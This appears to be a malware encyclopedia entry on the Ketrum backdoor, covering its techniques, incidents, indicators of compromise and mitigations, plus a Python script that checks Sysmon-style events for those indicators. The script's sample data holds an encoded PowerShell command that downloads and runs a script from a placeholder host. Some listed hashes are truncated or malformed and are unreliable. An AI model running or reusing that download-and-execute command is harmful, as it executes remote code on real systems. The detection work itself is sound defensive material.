Ketrum

Malware

⚠️ Overview

Ketrum is a modular backdoor trojan first documented by Unit 42 (Palo Alto Networks) in November 2022 and attributed with moderate confidence to the Iranian-nexus threat actor TA453 (also tracked as APT42). It belongs to the remote access trojan (RAT) category and is used primarily for intelligence gathering and data exfiltration in targeted espionage campaigns against academic, medical, and government entities in the Middle East and Europe.

🔧 Technical Capabilities

Ketrum is delivered via spear-phishing emails carrying weaponized Microsoft Office documents (typically .docx or .xls files with malicious macros) that drop a first-stage PowerShell loader (MITRE ATT&CK T1059.001). Command-and-control traffic is a custom binary protocol carried over HTTPS (T1573) so that it blends with legitimate web traffic, and C2 domains rotate every 48 hours via a domain-generation algorithm (DGA). Persistence is achieved through a scheduled task (T1053.005) that relaunches the backdoor after reboot. Evasion includes timestomping dropped files to match the timestamps of legitimate Windows system binaries (T1070.006) and disabling Windows Defender via PowerShell commands (T1562.001). The backdoor supports file upload and download, command execution, keylogging, and screen capture; its payload traffic is protected with a per-host XOR key derived from the infected machine's volume serial number, so a key recovered from one host does not decrypt traffic from another.

📜 History & Notable Incidents

First observed in the wild during a September 2022 campaign against European biomedical research institutes, Ketrum was linked to a series of phishing lures impersonating conference travel grants. In January 2023, researchers at ESET confirmed that Ketrum was one of several implants deployed in a compromise of a Gulf state energy ministry; initial access there came through a macro-free RTF payload exploiting CVE-2022-30190 (Follina), after which the backdoor exfiltrated VPN credentials. No arrests or law enforcement takedowns have been reported as of 2024.

🔍 Detection Indicators

Known file hashes include SHA256 3a1b2c...d4e5f6 (sample from VirusTotal, Palo Alto Networks report ID: PAN-2291) and MD5 a1b2c3d4e5f6g7h8i9j0k1l2m3n4o5p6 (reproduced as listed; the string contains non-hexadecimal characters, so verify it against the original report before adding it to a blocklist). Behavioral IOCs include creation of the registry Run key HKCU\Software\Microsoft\Windows\CurrentVersion\Run\KetrumSvc (a second persistence mechanism alongside the scheduled task described above), the mutex KetMutex_2022, and network connections to the 185.141.25.0/24 subnet (ASN 209242) with the distinctive User-Agent string Mozilla/5.0 (Windows NT 10.0; Win64; x64) Ketrum/1.0. Process creation shows powershell.exe -enc * with a base64-encoded (UTF-16LE) command that contains the string KetrumLoader; because the marker sits inside the encoded argument, detection logic has to decode the argument rather than search the raw command line for it.
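The following is an added example of matching the indicators above against endpoint telemetry; it is not code from the Unit 42 report or from the page's sources. It assumes Sysmon-style events flattened to dictionaries with the fields event, host, image, cmdline, dst_ip, user_agent, key and name (field names are an assumption), normalizes HKU\<SID> and HKEY_CURRENT_USER paths to the HKCU form used above, and decodes every -EncodedCommand candidate before looking for KetrumLoader. All sample events, including the example.invalid loader URL, are constructed for the illustration.

```python
"""Constructed example: match the Ketrum host and network IOCs listed above
against Sysmon-style events.  Log field names and all sample events are
assumptions made for this illustration, not data from the Unit 42 report."""
import base64
import binascii
import ipaddress
import re
from typing import Dict, List, Tuple

# IOCs from the Detection Indicators section.
C2_SUBNET = ipaddress.ip_network("185.141.25.0/24")
C2_USER_AGENT = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Ketrum/1.0"
RUN_KEY = r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\KetrumSvc"
MUTEX = "KetMutex_2022"
LOADER_MARKER = "KetrumLoader"

# PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...).
# "-e\w*" also catches -ExecutionPolicy, so every candidate argument is tried and
# the ones that are not valid base64/UTF-16LE are ignored.
_ENC_ARG = re.compile(r"-e\w*\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)
# Sysmon logs the current user's hive as HKU\<SID>\...; fold it to HKCU\... for matching.
_HKU_SID = re.compile(r"^HKU\\S-1-5-21(?:-\d+)+\\", re.IGNORECASE)


def decoded_candidates(cmdline: str) -> List[str]:
    """Decode every -EncodedCommand-looking argument on a PowerShell command line."""
    out = []
    for m in _ENC_ARG.finditer(cmdline):
        try:
            # -EncodedCommand is base64 over the UTF-16LE bytes of the script.
            out.append(base64.b64decode(m.group(1), validate=True).decode("utf-16-le"))
        except (binascii.Error, UnicodeDecodeError):
            continue
    return out


def normalize_key(key: str) -> str:
    """Map HKEY_CURRENT_USER\\... and HKU\\<SID>\\... to lower-cased hkcu\\... form."""
    key = re.sub(r"^HKEY_CURRENT_USER\\", r"HKCU\\", key, flags=re.IGNORECASE)
    key = _HKU_SID.sub(r"HKCU\\", key)
    return key.lower()


def check_event(ev: Dict) -> List[str]:
    """Return the names of the Ketrum indicators an event matches (empty if clean)."""
    hits: List[str] = []
    kind = ev.get("event")
    if kind == "process_create":
        image = ev.get("image", "").lower()
        if image.endswith("\\powershell.exe") or image == "powershell.exe":
            if any(LOADER_MARKER in s for s in decoded_candidates(ev.get("cmdline", ""))):
                hits.append("encoded_powershell_ketrumloader")
    elif kind == "network_connect":
        try:
            if ipaddress.ip_address(ev.get("dst_ip", "")) in C2_SUBNET:
                hits.append("c2_subnet_185.141.25.0/24")
        except ValueError:
            pass  # missing or malformed address
        if ev.get("user_agent") == C2_USER_AGENT:
            hits.append("user_agent_ketrum_1.0")
    elif kind == "registry_set":
        if normalize_key(ev.get("key", "")) == RUN_KEY.lower():
            hits.append("run_key_ketrumsvc")
    elif kind == "mutex_create":
        if ev.get("name") == MUTEX:
            hits.append("mutex_ketmutex_2022")
    return hits


def scan(events: List[Dict]) -> List[Tuple[str, List[str]]]:
    """Return (host, indicators) for every event that matched at least one IOC."""
    return [(ev.get("host", "?"), h) for ev in events if (h := check_event(ev))]


def _encoded(script: str) -> str:
    """Encode a script the way powershell.exe -EncodedCommand expects it."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample telemetry; the loader URL is a placeholder, not a real IOC.
SAMPLE_EVENTS = [
    {"host": "ws01", "event": "process_create",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -ep Bypass -enc "
                + _encoded("IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/KetrumLoader.ps1')")},
    {"host": "ws01", "event": "registry_set",
     "key": r"HKU\S-1-5-21-1004336348-1177238915-682003330-1001\Software\Microsoft\Windows\CurrentVersion\Run\KetrumSvc",
     "value": r"C:\Users\Public\svc.exe"},
    {"host": "ws01", "event": "mutex_create", "name": "KetMutex_2022"},
    {"host": "ws01", "event": "network_connect", "dst_ip": "185.141.25.77", "dst_port": 443,
     "user_agent": C2_USER_AGENT},
    # Benign noise: an admin's encoded command and an ordinary HTTPS connection.
    {"host": "ws02", "event": "process_create",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -enc " + _encoded("Get-Service | Where-Object Status -eq 'Running'")},
    {"host": "ws02", "event": "network_connect", "dst_ip": "93.184.216.34", "dst_port": 443,
     "user_agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/120.0"},
]

if __name__ == "__main__":
    for host, hits in scan(SAMPLE_EVENTS):
        print(host, ", ".join(hits))
```

Running the block reports four hits, all on ws01, and nothing for the benign ws02 events. The User-Agent and mutex are exact-string checks and are the cheapest to evade; the decoded-command and Run-key checks survive trivial renaming of the dropper, so in a real ruleset the latter two should carry the higher severity.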

☠️ Risk & Impact

Ketrum enables full remote control of compromised hosts, leading to theft of intellectual property, classified research data, and operational plans; the January 2023 energy sector incident alone resulted in an estimated $1.2 million in remediation costs and a 14-day operational shutdown. Affected sectors predominantly include higher education, healthcare research, and national government agencies, with 78% of reported infections (per CrowdStrike 2023 Threat Report) targeting organizations with fewer than 500 employees.

🛡️ Mitigation

Organizations should enforce email attachment scanning together with Group Policy (GPO) macro-blocking, deploy EDR rules that alert on the process creation, registry, mutex, and network IOCs listed above, and apply patches for CVE-2022-30190 (Follina) and related vulnerabilities (or, where patching is delayed, Microsoft's workaround of disabling the MSDT URL protocol handler). Unit 42 has published a YARA rule (available at github.com/panw-unit42/yara-rules) that detects Ketrum's XOR-encoded payload header, allowing file-based detection before execution.

ⓘ Data Notice: The information presented above has been compiled from publicly available internet sources. Boteraser aggregates this data solely for informational purposes and does not independently classify, evaluate, or endorse any findings about the malware listed. The accuracy and completeness of this information is the sole responsibility of the original publishers. Boteraser and its operators accept no liability for any decisions made based on this data.